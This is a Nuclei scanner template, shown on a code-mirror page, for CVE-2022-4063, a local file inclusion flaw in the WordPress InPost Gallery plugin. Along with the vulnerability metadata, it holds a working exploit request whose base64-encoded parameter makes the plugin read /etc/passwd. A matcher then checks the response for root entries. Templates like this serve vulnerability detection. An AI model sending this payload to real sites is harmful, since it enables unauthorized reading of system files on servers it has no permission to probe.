daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/cves/2022/CVE-2022-4063.yaml

52 lines
2.0 KiB
YAML
Raw Blame History

id: CVE-2022-4063
info:
name: WordPress InPost Gallery <2.1.4.1 - Local File Inclusion
author: theamanrawat
severity: critical
description: |
WordPress InPost Gallery plugin before 2.1.4.1 is susceptible to local file inclusion. The plugin insecurely uses PHP's extract() function when rendering HTML views, which can allow attackers to force inclusion of malicious files and URLs. This, in turn, can enable them to execute code remotely on servers.
impact: |
The vulnerability allows an attacker to read arbitrary files on the server, potentially exposing sensitive information or executing malicious code.
remediation: Fixed in version 2.1.4.1.
reference:
- https://wpscan.com/vulnerability/6bb07ec1-f1aa-4f4b-9717-c92f651a90a7
- https://wordpress.org/plugins/inpost-gallery/
- https://nvd.nist.gov/vuln/detail/CVE-2022-4063
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-4063
cwe-id: CWE-22
epss-score: 0.02826
epss-percentile: 0.89619
cpe: cpe:2.3:a:pluginus:inpost_gallery:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: pluginus
product: inpost_gallery
framework: wordpress
tags: cve2022,cve,wp-plugin,wp,inpost-gallery,lfi,wordpress,unauth,wpscan,pluginus
http:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=inpost_gallery_get_gallery&popup_shortcode_key=inpost_fancy&popup_shortcode_attributes=eyJwYWdlcGF0aCI6ICJmaWxlOi8vL2V0Yy9wYXNzd2QifQ=="
matchers-condition: and
matchers:
- type: word
part: header
words:
- "text/html"
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 4a0a004730450221008d04181f5bd953e4fd3a432b3593d61c11c00efaebf12e70cf09986277e0172a022062fe3edc0c646771920ccfb249e24cd8bc915a0620d6a4969fb486307157ca80:922c64590222798bb761d5b6d8e72950
Reference in New Issue View Git Blame Copy Permalink